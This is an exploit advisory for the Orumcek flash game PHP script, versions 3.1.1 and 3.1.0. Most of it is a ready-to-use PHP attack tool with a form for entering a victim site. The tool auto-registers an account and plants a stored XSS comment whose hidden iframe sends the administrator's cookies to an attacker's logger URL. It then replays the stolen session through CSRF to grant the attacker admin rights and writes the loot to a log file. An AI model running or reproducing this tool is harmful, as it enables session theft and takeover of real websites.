Orumcek flash oyun v3.1.1 & v3.1.0 XSS & CSRF Vulnerability

2013.06.09
Credit: FreWaL
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

# Exploit Title: rmcek flash oyun v3.1.1 & v3.1.0 XSS & CSRF Vulnerability # Google Dork: &#169;2010 - 2013 cretsiz Flash Oyun Scripti kullan&#305;larak haz&#305;rlanm&#305;t&#305;r. # Date: 08.06.2013 # Exploit Author: FreWaL | frewal@frewal.net # Vendor Homepage: http://www.orumcekoyun.com/ # Software Link: http://orumcekoyun.com/surumler.html # Version: v3.1.1(latest) & v3.1.0 ########################################################## # Exploit Video : http://www.youtube.com/watch?v=mu4uFBhhv68&feature=youtu.be ########################################################## # Dr.Ly0n & FreWaL --> http://frewals.blogspot.com ########################################################## Create one file name is : yazdim.html chmod 777 . its Exploit function automatic register website and automatic craate exploit and automatic send ... its exploit & sniffer.. Please follow the exploit's video ########################################################## Bir dosya olusturun ve adini : yazdim.html yapin chmod 777 verin. Bu exploitin islevi otomatik kayit olur otomatik exploiti olusturur ve admine gonderir. bu hem exploit hemde sniffer gorevi gorur. Lutfen exploit videosunu izleyiniz. ########################################################## its video gir.php exploit ... <?php /* Coded by FreWaL & Dr.Ly0n For Angelz Co. 
http://frewals.blogspot.com */ $cookie = $_GET['fw']; $u1 = $_GET['u1']; $u2 = $_GET['u2']; $ip = $_SERVER['REMOTE_ADDR']; $ilk = explode('&',$cookie); $sonx = $ilk[1]; $son1 = $ilk[2]; $bolbi = explode("|",urldecode($ilk[0])); $tamurl = explode("http://",$bolbi[0]); $tamurlx = explode("/",$tamurl[1]); $tamurlz = $tamurlx[0]; $kids = explode("=",$sonx); $kidi = $kids[1]; $ozbo = explode("panel",$bolbi[0]); $sifirURL = trim($ozbo[0]); $loggerURLz = ''; function exploitUygula($getirverbaga, $logURL){ $dosya = 'http://'.$getirverbaga.'/panel/js/tiny_mce/tiny_mce.js'; $kontrol = @fopen($dosya , "r"); if ($kontrol) { $rakam = rand(100,999); $kadi = 'ayse'.$rakam ; $mail = 'ayse'.$rakam.'%40hotmail.com'; $pass = 'frewal'; $fwdr1 = curl_init(); curl_setopt($fwdr1, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/index.php?do=register'); curl_setopt($fwdr1, CURLOPT_POSTFIELDS,'isim=Ayse&soyisim=Sonmez&gun=1&ay=1&yil=1992&email='.$mail.'&kadi='.$kadi.'&password='.$pass.'&cpassword='.$pass.'&capchacevap=40&Submit=Kabul+%2F+%C3%9Cye+Ol'); curl_setopt($fwdr1, CURLOPT_POST, 1); curl_setopt($fwdr1, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)"); curl_setopt($fwdr1, CURLOPT_RETURNTRANSFER, 1); curl_setopt($fwdr1, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/index.php?do=register'); curl_setopt($fwdr1, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($fwdr1, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($fwdr1, CURLOPT_SSL_VERIFYHOST, 0); $uyelik=curl_exec($fwdr1); curl_close($fwdr1); $postx = 'kadi='.$kadi.'&password='.$pass.'&Submit=G%C4%B0R%C4%B0%C5%9E+YAP'; $fwdr2 = curl_init(); curl_setopt($fwdr2, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/index.php?do=login'); //curl_setopt($fwdr2, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/do-login.php?kadi='.$kadi.'&sifre='.$pass.''); curl_setopt($fwdr2, CURLOPT_POSTFIELDS,$postx); curl_setopt($fwdr2, CURLOPT_POST, 1); curl_setopt($fwdr2, CURLOPT_USERAGENT, "Mozilla/5.0 
(Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)"); curl_setopt($fwdr2, CURLOPT_HEADER, 1); curl_setopt($fwdr2, CURLOPT_RETURNTRANSFER, 1); curl_setopt($fwdr2, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/do-login.php'); curl_setopt($fwdr2, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($fwdr2, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($fwdr2, CURLOPT_SSL_VERIFYHOST, 0); $uyelik1=curl_exec($fwdr2); curl_close($fwdr2); //echo $uyelik1.'<br>'; $ids = explode("ORUMCEK_MEMBER_ID=",$uyelik1); $soid = explode(";",end($ids)); $hashi = explode("ORUMCEK_HASH=",$uyelik1); $hashi1 = explode(";",end($hashi)); $ORUMCEK_MEMBER_ID = trim($soid[0]); $ORUMCEK_ADMIN = '0'; $ORUMCEK_LOGIN_NAME = $kadi; $ORUMCEK_HASH = trim($hashi1[0]); $ORUMCEK_PASSWD = md5($pass); $cookies = 'ORUMCEK_MEMBER_ID='.$ORUMCEK_MEMBER_ID.'; ORUMCEK_ADMIN='.$ORUMCEK_ADMIN.'; ORUMCEK_LOGIN_NAME='.$ORUMCEK_LOGIN_NAME.'; ORUMCEK_HASH='.$ORUMCEK_HASH.'; ORUMCEK_PASSWD='.$ORUMCEK_PASSWD.''; echo $cookies.'<br>'; echo '-> islem tamamlandi !! 
-> complete!!'; $postverisi = 'yorumekle=yorumekle&oyunid=1&yorumotomatikonay=0&capchacevap=7&yorum=%3Cp%3EBence+s%26uuml%3Bper+oyun+herkese+tavsiye+ediyorum!+te%C5%9Fekk%26uuml%3Brler+admin...%3C%2Fp%3E%0D%0A%3Cdiv+style%3D%22display%3A+none%3B%22%3E%3Ciframe+id%3D%22iframe_ooyun%22+frameborder%3D%22100%22+scrolling%3D%22no%22+width%3D%220%22+height%3D%220%22%3E%3C%2Fiframe%3E%3C%2Fdiv%3E%0D%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%2F%2F+%3C!%5BCDATA%5B%0D%0Avar++urlMbenim+%3D+%22'.$logURL.'%3Ffw%3D%22%3B%0D%0A%09var+data+%3D+escape(document.URL)+%2B+%22%7C%22+%2B+escape(document.cookie)+%2B+%22%26kidi%3D'.$ORUMCEK_MEMBER_ID.'%26kadi%3D'.$ORUMCEK_LOGIN_NAME.'%22%3B%0D%0A++++document.getElementById(%22iframe_ooyun%22).src+%3D+urlMbenim+%2B+escape(data)%3B%0D%0A%2F%2F+%5D%5D%3E%3C%2Fscript%3E'; $fwdrsn = curl_init(); curl_setopt($fwdrsn, CURLOPT_URL, 'http://'.$getirverbaga.'/uye/uyeislem.php'); curl_setopt($fwdrsn, CURLOPT_POSTFIELDS,$postverisi); curl_setopt($fwdrsn, CURLOPT_POST, 1); curl_setopt($fwdrsn, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)"); curl_setopt($fwdrsn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($fwdrsn, CURLOPT_REFERER, 'http://'.$getirverbaga.'/uye/uyeislem.php'); curl_setopt($fwdrsn, CURLOPT_HTTPHEADER, array("Content-Type: application/x-www-form-urlencoded; charset=UTF-8","Cookie: $cookies")); curl_setopt($fwdrsn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($fwdrsn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($fwdrsn, CURLOPT_SSL_VERIFYHOST, 0); $gelss=curl_exec($fwdrsn); curl_close($fwdrsn); ################################# } else { echo "Bu versiyon bu acik icin uyumlu degildir !! 
, This version is not compatible to the open"; } ################################# } if($cookie != ""){ $gelss = file_get_contents('yazdim.html'); if(strstr($gelss,$tamurlz)){ //echo 'var'; }else{ $fwdr = curl_init(); curl_setopt($fwdr, CURLOPT_URL, $sifirURL.'/panel/islemler.php?islem=uye_admin&uyeid='.$kidi.''); curl_setopt($fwdr, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)"); curl_setopt($fwdr, CURLOPT_RETURNTRANSFER, 1); curl_setopt($fwdr, CURLOPT_REFERER, $sifirURL.'/panel/islemler.php?islem=uye_admin&uyeid='.$kidi.''); curl_setopt($fwdr, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded','Cookie: '.trim($bolbi[1]).'')); curl_setopt($fwdr, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($fwdr, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($fwdr, CURLOPT_SSL_VERIFYHOST, 0); $gel=curl_exec($fwdr); curl_close($fwdr); $frewalgelen=fopen("yazdim.html","a"); fwrite($frewalgelen,'<hr color=#000000;> <u><font face="verdana" size="-2">Cookiler&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font></u><font face=verdana size=-2> <u>:</u> <b>'.$bolbi[1].'</b><br> <u>Site&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; :</u> <b>'.$bolbi[0].'</b></br> <u>Senin Ekledigin Admin :</u> <b>Your UserID-UserName->'.$sonx.'-'.$son1.' 
Default Sifre( Password ) : frewal</b></br> <u>IP Adresi&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; :</u> <b>'.$ip.'</b><br> <hr color=#000000;> </font>'); } }else{ echo ' <br>ornek hedef / sample viktim : www.google.com/orumcekoyunpath<br> <br>ornek log dosyasi / sample LogURL : http://asdf.com/log.php<br> <form method="GET" action=""> <p>Victim Site : <input type="text" name="u1" value="" size="47"></p> <p>Logger URL :<input type="text" name="u2" value="'.$loggerURLz.'" size="47"></p> <p><input type="submit" value="Pompala | Sennnnddd :))" name="B1"></p> </form> '; } if($u1 != ""){ echo exploitUygula($u1, $u2); } ?>

References:

http://www.youtube.com/watch?v=mu4uFBhhv68&feature=youtu.be




